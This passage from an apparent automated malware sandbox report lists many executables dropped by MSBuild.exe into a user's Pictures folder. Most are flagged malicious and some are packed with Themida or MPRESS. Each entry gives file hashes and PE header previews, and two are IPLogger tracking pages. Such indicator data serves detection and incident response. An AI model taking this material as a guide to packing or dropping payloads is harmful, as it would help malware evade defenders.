C:\Users\user\Pictures\ZoBfdkTi1TzYd4Qho9RGiD49.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6132736
Entropy (8bit):	7.152487916364851
Encrypted:	false
SSDEEP:	98304:mkpa5UKdCrbpaah6k5u6yA6nE0w5jjvjjjjl5S/hdIOrd/ClFkydIy3rBld3:m3fdCxaah75uUSw5jjvjjjj3dOr5TLyF
MD5:	BE94B480184550913C269E35A13AD28C
SHA1:	57C2F9CBEB17F80A540A6AEAFDD61F28443418CE
SHA-256:	40E1C85ADECCCC0D02B09681A421BA0457962BFD1A035A5BD234EC13C55AD2F4
SHA-512:	CB52C1D8E9D820A352FE6CB1DE21C80BB55512230C8287DB6C80A2C958CA23ECEA38C80480DEEF2A0E9157EFFEAE12E9868428404ACAD19A6D6F983A822580E3
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f.........."....'............X.%........@.............................`p.....kJ^...`...................................................!.......n..K....m...............n...............................!.(................................................... .........p.................. ..` Fp...........t..............@..@ .............X..............@... .....P.......j..............@..@ .....P......................@..@.ZiZ....5K...`...L..................@..@ .!....!......B..............@..@.idata........!......P..............@....tls..........!......R...................themida..K..."...K..T..............`....@2\|..........m......TZ.............@..H.reloc........n......F[................@.rsrc....K....n..L...H[.............@..@........................................................................................

C:\Users\user\Pictures\b7aAk4NsmjOyCEFaPAgyoXSd.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4397448
Entropy (8bit):	7.975616994122795
Encrypted:	false
SSDEEP:	98304:qY0iiOGs4kNz5RsnY94XbhU2588fOMkamQm2P/zAYFx94r:/AOR4kNz52Y2mz+DmQxP/MYFx9+
MD5:	C77688380A61580C30BD94BD9C97C1EB
SHA1:	E1A4CA7BE9DC31B71F0699BD6A4D3254F2CEC948
SHA-256:	5F8F2FCC7527DFDC4D949E086A38E3C0CE1A46D2FDB48A5A2DBEA1295CD0968B
SHA-512:	17673E134B92394A37623007163BEB5F877A056D36F4037DE06A63815BC614009161EE889F3F43EDC083F0C9BEA7BC2FED8B60022D9B0C1981DE41A027EDFC5C
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...?..d.....................8.......i............@..................................C......................................?..P.....................C.............0...8............................)..@............................................text.............................. ..`.rdata..............................@..@.data.......P....?..6..............@....rsrc................*B.............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Pictures\bgw33Otai3n3FHEj79p4BuQd.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	461825
Entropy (8bit):	7.236343038158279
Encrypted:	false
SSDEEP:	6144:D6k7Z5ysHkE/g5dUlUjnwuhDBOT83WqF18VmfEhglcQ78N3Nv:uIDymkE/MdGGnwsDEgGM8o1zwN9v
MD5:	DC66D8F64F9DE14A95471083A50D5188
SHA1:	E06B3F30A66DFBC6AEFEFE1C624C1A4C3D87971D
SHA-256:	529B02677E4645C0A5700FA22008E6BC122F13249CCBC4A2D70D2B359885EBCA
SHA-512:	731823870519B8F1854E8FA598A832F238D562FD6991625B50DFA3B166C80D985F0A5544B85F39357688FEDB631AEBE1DC8C8EFDB1A779C183A33DD177AA4C55
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...q..c.....................6.......i............@................................9........................................?..P.......i...........................0...8............................)..@............................................text.............................. ..`.rdata..............................@..@.data...h....P.......6..............@....rsrc...i............&..............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Pictures\dAQPk6VJcRnzNryadPob76ur.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	461825
Entropy (8bit):	7.236343038158279
Encrypted:	false
SSDEEP:	6144:D6k7Z5ysHkE/g5dUlUjnwuhDBOT83WqF18VmfEhglcQ78N3Nv:uIDymkE/MdGGnwsDEgGM8o1zwN9v
MD5:	DC66D8F64F9DE14A95471083A50D5188
SHA1:	E06B3F30A66DFBC6AEFEFE1C624C1A4C3D87971D
SHA-256:	529B02677E4645C0A5700FA22008E6BC122F13249CCBC4A2D70D2B359885EBCA
SHA-512:	731823870519B8F1854E8FA598A832F238D562FD6991625B50DFA3B166C80D985F0A5544B85F39357688FEDB631AEBE1DC8C8EFDB1A779C183A33DD177AA4C55
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...q..c.....................6.......i............@................................9........................................?..P.......i...........................0...8............................)..@............................................text.............................. ..`.rdata..............................@..@.data...h....P.......6..............@....rsrc...i............&..............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Pictures\e9BFbVGJvYbRX1O9pfx94p87.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4397448
Entropy (8bit):	7.975616994122795
Encrypted:	false
SSDEEP:	98304:qY0iiOGs4kNz5RsnY94XbhU2588fOMkamQm2P/zAYFx94r:/AOR4kNz52Y2mz+DmQxP/MYFx9+
MD5:	C77688380A61580C30BD94BD9C97C1EB
SHA1:	E1A4CA7BE9DC31B71F0699BD6A4D3254F2CEC948
SHA-256:	5F8F2FCC7527DFDC4D949E086A38E3C0CE1A46D2FDB48A5A2DBEA1295CD0968B
SHA-512:	17673E134B92394A37623007163BEB5F877A056D36F4037DE06A63815BC614009161EE889F3F43EDC083F0C9BEA7BC2FED8B60022D9B0C1981DE41A027EDFC5C
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...?..d.....................8.......i............@..................................C......................................?..P.....................C.............0...8............................)..@............................................text.............................. ..`.rdata..............................@..@.data.......P....?..6..............@....rsrc................*B.............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Pictures\eRuQ9CSoyYCbA7kgv2O4hBGL.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4397448
Entropy (8bit):	7.975616994122795
Encrypted:	false
SSDEEP:	98304:qY0iiOGs4kNz5RsnY94XbhU2588fOMkamQm2P/zAYFx94r:/AOR4kNz52Y2mz+DmQxP/MYFx9+
MD5:	C77688380A61580C30BD94BD9C97C1EB
SHA1:	E1A4CA7BE9DC31B71F0699BD6A4D3254F2CEC948
SHA-256:	5F8F2FCC7527DFDC4D949E086A38E3C0CE1A46D2FDB48A5A2DBEA1295CD0968B
SHA-512:	17673E134B92394A37623007163BEB5F877A056D36F4037DE06A63815BC614009161EE889F3F43EDC083F0C9BEA7BC2FED8B60022D9B0C1981DE41A027EDFC5C
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...?..d.....................8.......i............@..................................C......................................?..P.....................C.............0...8............................)..@............................................text.............................. ..`.rdata..............................@..@.data.......P....?..6..............@....rsrc................*B.............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Pictures\emoDG0nH5rlkVVnXgc1mj5b6.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6132736
Entropy (8bit):	7.152487916364851
Encrypted:	false
SSDEEP:	98304:mkpa5UKdCrbpaah6k5u6yA6nE0w5jjvjjjjl5S/hdIOrd/ClFkydIy3rBld3:m3fdCxaah75uUSw5jjvjjjj3dOr5TLyF
MD5:	BE94B480184550913C269E35A13AD28C
SHA1:	57C2F9CBEB17F80A540A6AEAFDD61F28443418CE
SHA-256:	40E1C85ADECCCC0D02B09681A421BA0457962BFD1A035A5BD234EC13C55AD2F4
SHA-512:	CB52C1D8E9D820A352FE6CB1DE21C80BB55512230C8287DB6C80A2C958CA23ECEA38C80480DEEF2A0E9157EFFEAE12E9868428404ACAD19A6D6F983A822580E3
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f.........."....'............X.%........@.............................`p.....kJ^...`...................................................!.......n..K....m...............n...............................!.(................................................... .........p.................. ..` Fp...........t..............@..@ .............X..............@... .....P.......j..............@..@ .....P......................@..@.ZiZ....5K...`...L..................@..@ .!....!......B..............@..@.idata........!......P..............@....tls..........!......R...................themida..K..."...K..T..............`....@2\|..........m......TZ.............@..H.reloc........n......F[................@.rsrc....K....n..L...H[.............@..@........................................................................................

C:\Users\user\Pictures\fNXuIJPtZ25Cf8AC2M7nLhvu.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4397448
Entropy (8bit):	7.975616994122795
Encrypted:	false
SSDEEP:	98304:qY0iiOGs4kNz5RsnY94XbhU2588fOMkamQm2P/zAYFx94r:/AOR4kNz52Y2mz+DmQxP/MYFx9+
MD5:	C77688380A61580C30BD94BD9C97C1EB
SHA1:	E1A4CA7BE9DC31B71F0699BD6A4D3254F2CEC948
SHA-256:	5F8F2FCC7527DFDC4D949E086A38E3C0CE1A46D2FDB48A5A2DBEA1295CD0968B
SHA-512:	17673E134B92394A37623007163BEB5F877A056D36F4037DE06A63815BC614009161EE889F3F43EDC083F0C9BEA7BC2FED8B60022D9B0C1981DE41A027EDFC5C
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...?..d.....................8.......i............@..................................C......................................?..P.....................C.............0...8............................)..@............................................text.............................. ..`.rdata..............................@..@.data.......P....?..6..............@....rsrc................*B.............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Pictures\fbQkxrJoAES30cVcdBN8aXwZ.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	MS-DOS executable PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows, MZ for MS-DOS
Category:	dropped
Size (bytes):	3302400
Entropy (8bit):	7.983528152249971
Encrypted:	false
SSDEEP:	49152:fEOGfMr0UrM21zm6mVonU7JCGjh9FDrjop1jy50JtrD2sGxgLJ+r8+NSR63xrO0s:rtr0CnnGJCGl9GDnrNGaLJ5RKxy
MD5:	5C0D04CCD0CBCD8CC90A502DF8B512E7
SHA1:	0F905A137B801A69CF498FC0F8C5F00E75C5E689
SHA-256:	BC84C3A9CFEB083FE41A238C55EA3163B5C9E5103FEE0A7D7F4D8A1236B6D22D
SHA-512:	2D8D2630D4C362C67BC54BAD9B49DD0B11A5B9623CF106099B141E3FCF66D8032A3B855169BD636FEBFE517F0C8581DF62F70E77AF3C9CC7691AC407F7391D23
Malicious:	true
Reputation:	unknown
Preview:	MZ@.....................................!..L.!Win64 .EXE...$@...PE..d......f.........."....'.....r.......Qp........@..............................r.....x.3... ..................................................Pp......`p..E...en......F\.h....................................\p.(....................Pp.`............................MPRESS1.@p.......0......................MPRESS2.....Pp.......0..................rsrc....E...`p..F....0.............@..............................................................v2.19....0. ../;.,...p.#..JNy..P..{....I..W._...d......N. ^f.3...u...J......=.K\3.p...1....L.a...y.!.....}.\|.......1..K.l...Fl'......:..D.yfcOh.p..i.Ki>......d.Yc.C&J.0..P+.....`.M.....R..s.;.n.t.......%.....II4u. .......f_..+...\|.._.!.v.r...d..O..L.G...HZ...`....p.cy..n..........G..Bq.9#Q.......RU.?f.:.....a..'..>G.X{.........g....B(.....X.gu>M~...;...A2..<..........`.*~......pYs..p3g).Yr......n...a.K.i.Nd56.&J.'...r.n...T...Z..F.pK.\|.I$.u..W.Z..A.!....z.o\|.....f<

C:\Users\user\Pictures\gxNMHUmIRRsTpoh2kGfIr9lW.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:	dropped
Size (bytes):	7446
Entropy (8bit):	5.422209848736349
Encrypted:	false
SSDEEP:	192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:	5B423612B36CDE7F2745455C5DD82577
SHA1:	0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:	E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:	C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:	false
Reputation:	unknown
Preview:	<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o

C:\Users\user\Pictures\h9MmfvkW2XknV10h725GOqVL.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:	dropped
Size (bytes):	7446
Entropy (8bit):	5.422209848736349
Encrypted:	false
SSDEEP:	192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:	5B423612B36CDE7F2745455C5DD82577
SHA1:	0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:	E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:	C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:	false
Reputation:	unknown
Preview:	<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o

C:\Users\user\Pictures\iWlE1PLcvZdqKeIUsVDIfjKo.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5388160
Entropy (8bit):	6.8841256360173215
Encrypted:	false
SSDEEP:	98304:t0NFR6666666666666666666666666666666x666666666666666fwwwwwwwwwwX:GPMki6zio75L3pf3dedO4keCIwkoYbg3
MD5:	AC34973A85E7E2B79A4778C19F06B9D9
SHA1:	7C6398F803019A0C1F68741E3F8B63E8248EBFFE
SHA-256:	81D6AD7833FB88BD0CB36BF15B2829E35E4B5111C9A5AB7B2DA03A48FEE3BB0D
SHA-512:	F7C0E802FBFAAAC3B508858F96E9503F189A5E274017D81F1AFA8149D870C2010503AE3FF4DD9AE359146302E83D1CB78A7B9C5C4312CBC6E21DCE16921CBAB3
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...zL.f.........."......Z....M.....\|*............@..........................`R.....'JR...@.....................................P........{L...........R..+... R..7..`...............................8q...............................................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data....4...P.......8..............@....tls.................V..............@....rsrc....{L......\|L..X..............@..@.reloc...7... R..8....Q.............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Pictures\itMidjIgtoMzghFLrzdYkPDa.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	461825
Entropy (8bit):	7.236343038158279
Encrypted:	false
SSDEEP:	6144:D6k7Z5ysHkE/g5dUlUjnwuhDBOT83WqF18VmfEhglcQ78N3Nv:uIDymkE/MdGGnwsDEgGM8o1zwN9v
MD5:	DC66D8F64F9DE14A95471083A50D5188
SHA1:	E06B3F30A66DFBC6AEFEFE1C624C1A4C3D87971D
SHA-256:	529B02677E4645C0A5700FA22008E6BC122F13249CCBC4A2D70D2B359885EBCA
SHA-512:	731823870519B8F1854E8FA598A832F238D562FD6991625B50DFA3B166C80D985F0A5544B85F39357688FEDB631AEBE1DC8C8EFDB1A779C183A33DD177AA4C55
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...q..c.....................6.......i............@................................9........................................?..P.......i...........................0...8............................)..@............................................text.............................. ..`.rdata..............................@..@.data...h....P.......6..............@....rsrc...i............&..............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Pictures\j5y10uqj39KWgJqNPePuwKtH.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4397448
Entropy (8bit):	7.975616994122795
Encrypted:	false
SSDEEP:	98304:qY0iiOGs4kNz5RsnY94XbhU2588fOMkamQm2P/zAYFx94r:/AOR4kNz52Y2mz+DmQxP/MYFx9+
MD5:	C77688380A61580C30BD94BD9C97C1EB
SHA1:	E1A4CA7BE9DC31B71F0699BD6A4D3254F2CEC948
SHA-256:	5F8F2FCC7527DFDC4D949E086A38E3C0CE1A46D2FDB48A5A2DBEA1295CD0968B
SHA-512:	17673E134B92394A37623007163BEB5F877A056D36F4037DE06A63815BC614009161EE889F3F43EDC083F0C9BEA7BC2FED8B60022D9B0C1981DE41A027EDFC5C
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...?..d.....................8.......i............@..................................C......................................?..P.....................C.............0...8............................)..@............................................text.............................. ..`.rdata..............................@..@.data.......P....?..6..............@....rsrc................*B.............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Pictures\jEBnyzNlpnxYBpX0SzTsilYc.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4397448
Entropy (8bit):	7.975616994122795
Encrypted:	false
SSDEEP:	98304:qY0iiOGs4kNz5RsnY94XbhU2588fOMkamQm2P/zAYFx94r:/AOR4kNz52Y2mz+DmQxP/MYFx9+
MD5:	C77688380A61580C30BD94BD9C97C1EB
SHA1:	E1A4CA7BE9DC31B71F0699BD6A4D3254F2CEC948
SHA-256:	5F8F2FCC7527DFDC4D949E086A38E3C0CE1A46D2FDB48A5A2DBEA1295CD0968B
SHA-512:	17673E134B92394A37623007163BEB5F877A056D36F4037DE06A63815BC614009161EE889F3F43EDC083F0C9BEA7BC2FED8B60022D9B0C1981DE41A027EDFC5C
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...?..d.....................8.......i............@..................................C......................................?..P.....................C.............0...8............................)..@............................................text.............................. ..`.rdata..............................@..@.data.......P....?..6..............@....rsrc................*B.............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Pictures\kj4vlWepIIui5EUsEpaKN5uf.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4397448
Entropy (8bit):	7.975616994122795
Encrypted:	false
SSDEEP:	98304:qY0iiOGs4kNz5RsnY94XbhU2588fOMkamQm2P/zAYFx94r:/AOR4kNz52Y2mz+DmQxP/MYFx9+
MD5:	C77688380A61580C30BD94BD9C97C1EB
SHA1:	E1A4CA7BE9DC31B71F0699BD6A4D3254F2CEC948
SHA-256:	5F8F2FCC7527DFDC4D949E086A38E3C0CE1A46D2FDB48A5A2DBEA1295CD0968B
SHA-512:	17673E134B92394A37623007163BEB5F877A056D36F4037DE06A63815BC614009161EE889F3F43EDC083F0C9BEA7BC2FED8B60022D9B0C1981DE41A027EDFC5C
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...?..d.....................8.......i............@..................................C......................................?..P.....................C.............0...8............................)..@............................................text.............................. ..`.rdata..............................@..@.data.......P....?..6..............@....rsrc................*B.............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Pictures\lGY9WNr93099Iipz5J2xUIwU.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	461825
Entropy (8bit):	7.236344410199689
Encrypted:	false
SSDEEP:	6144:D6k7Z5ysHkE/g5dUlUjnwuhDBOT83WqF18VmfEhglcQ78N3No:uIDymkE/MdGGnwsDEgGM8o1zwN9o
MD5:	AF2E668BC00063EB9E5B60BE6A127471
SHA1:	7BCDA8AF4AF5256C5CA96B7CC023EA34A476DD48
SHA-256:	5F9CA0C9DD86870D4A73C89F9BF8613116050DB4A041D9F15B1939C9FA4DDA1F
SHA-512:	0F426972949DB6069123AC75A047D7D70C7B61EA40A04090C65CF7EEFE784F870ED8C961B915514D6053FC84121CB51B20D82D78D734A4F6B6F60680D68BF5AF
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...q..c.....................6.......i............@................................9........................................?..P.......i...........................0...8............................)..@............................................text.............................. ..`.rdata..............................@..@.data...h....P.......6..............@....rsrc...i............&..............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Pictures\ngPRyE3pVf7AVqsG4El6sbei.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	461825
Entropy (8bit):	7.236343038158279
Encrypted:	false
SSDEEP:	6144:D6k7Z5ysHkE/g5dUlUjnwuhDBOT83WqF18VmfEhglcQ78N3Nv:uIDymkE/MdGGnwsDEgGM8o1zwN9v
MD5:	DC66D8F64F9DE14A95471083A50D5188
SHA1:	E06B3F30A66DFBC6AEFEFE1C624C1A4C3D87971D
SHA-256:	529B02677E4645C0A5700FA22008E6BC122F13249CCBC4A2D70D2B359885EBCA
SHA-512:	731823870519B8F1854E8FA598A832F238D562FD6991625B50DFA3B166C80D985F0A5544B85F39357688FEDB631AEBE1DC8C8EFDB1A779C183A33DD177AA4C55
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...q..c.....................6.......i............@................................9........................................?..P.......i...........................0...8............................)..@............................................text.............................. ..`.rdata..............................@..@.data...h....P.......6..............@....rsrc...i............&..............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Pictures\oda8FFwXlvLarxOY0ZoPcs8X.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5388160
Entropy (8bit):	6.884126509999761
Encrypted:	false
SSDEEP:	98304:P0NFR6666666666666666666666666666666x666666666666666fwwwwwwwwww3:cPMki6zio75L3pf3dedO4keCIwkoYbgX
MD5:	1180B61CFD274EEDCFC15489CC1A8195
SHA1:	C77934844610DA6C9275DC8EBEFDB4CCCBC2A069
SHA-256:	A3805EB5487971D2A04C9BABD457C5D6AC636883BC247D403852C67A0425D888
SHA-512:	974E15A839AA95284FD4F91808A9F68287625848D33ED2D63A13DFEDFDA5B8EA3BC8CBC537822FCD590EFD7E55845637AA7CF4E4DB02C08566D112B719593B3F
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...zL.f.........."......Z....M.....\|*............@..........................`R.....I.R...@.....................................P........{L...........R..+... R..7..`...............................8q...............................................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data....4...P.......8..............@....tls.................V..............@....rsrc....{L......\|L..X..............@..@.reloc...7... R..8....Q.............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Pictures\pVHGmT1xb3UJCnVvgRWBUZ7Y.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5388160
Entropy (8bit):	6.884125684219486
Encrypted:	false
SSDEEP:	98304:G0NFR6666666666666666666666666666666x666666666666666fwwwwwwwwww9:TPMki6zio75L3pf3dedO4keCIwkoYbgd
MD5:	65C3F205D9CB81AED171F5F73CFCE764
SHA1:	93CE5B2F5AF9EC2C3A4CE209072B20D36BA08664
SHA-256:	760031546D821FB7D2E5C822249C6AD46CB5D04D5ABD34601CF231236956624D
SHA-512:	42A5C7ACEFAC5D65617C2D08B499F55346584917ED697EBA501367DE3AD0520BF4DF53B09E51455FEF49A0A7D54AA55536E85C47E0263C4EF129588B765DEA8A
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...zL.f.........."......Z....M.....\|*............@..........................`R......R...@.....................................P........{L...........R..+... R..7..`...............................8q...............................................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data....4...P.......8..............@....tls.................V..............@....rsrc....{L......\|L..X..............@..@.reloc...7... R..8....Q.............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Pictures\rig4vLmrODGxubaXNA7eu9mO.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	MS-DOS executable PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows, MZ for MS-DOS
Category:	dropped
Size (bytes):	3302400
Entropy (8bit):	7.983528152249971
Encrypted:	false
SSDEEP:	49152:fEOGfMr0UrM21zm6mVonU7JCGjh9FDrjop1jy50JtrD2sGxgLJ+r8+NSR63xrO0s:rtr0CnnGJCGl9GDnrNGaLJ5RKxy
MD5:	5C0D04CCD0CBCD8CC90A502DF8B512E7
SHA1:	0F905A137B801A69CF498FC0F8C5F00E75C5E689
SHA-256:	BC84C3A9CFEB083FE41A238C55EA3163B5C9E5103FEE0A7D7F4D8A1236B6D22D
SHA-512:	2D8D2630D4C362C67BC54BAD9B49DD0B11A5B9623CF106099B141E3FCF66D8032A3B855169BD636FEBFE517F0C8581DF62F70E77AF3C9CC7691AC407F7391D23
Malicious:	true
Reputation:	unknown
Preview:	MZ@.....................................!..L.!Win64 .EXE...$@...PE..d......f.........."....'.....r.......Qp........@..............................r.....x.3... ..................................................Pp......`p..E...en......F\.h....................................\p.(....................Pp.`............................MPRESS1.@p.......0......................MPRESS2.....Pp.......0..................rsrc....E...`p..F....0.............@..............................................................v2.19....0. ../;.,...p.#..JNy..P..{....I..W._...d......N. ^f.3...u...J......=.K\3.p...1....L.a...y.!.....}.\|.......1..K.l...Fl'......:..D.yfcOh.p..i.Ki>......d.Yc.C&J.0..P+.....`.M.....R..s.;.n.t.......%.....II4u. .......f_..+...\|.._.!.v.r...d..O..L.G...HZ...`....p.cy..n..........G..Bq.9#Q.......RU.?f.:.....a..'..>G.X{.........g....B(.....X.gu>M~...;...A2..<..........`.*~......pYs..p3g).Yr......n...a.K.i.Nd56.&J.'...r.n...T...Z..F.pK.\|.I$.u..W.Z..A.!....z.o\|.....f<

C:\Users\user\Pictures\sNUwctL7GkZ5u0NI0scxfcy0.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4397448
Entropy (8bit):	7.975616994122795
Encrypted:	false
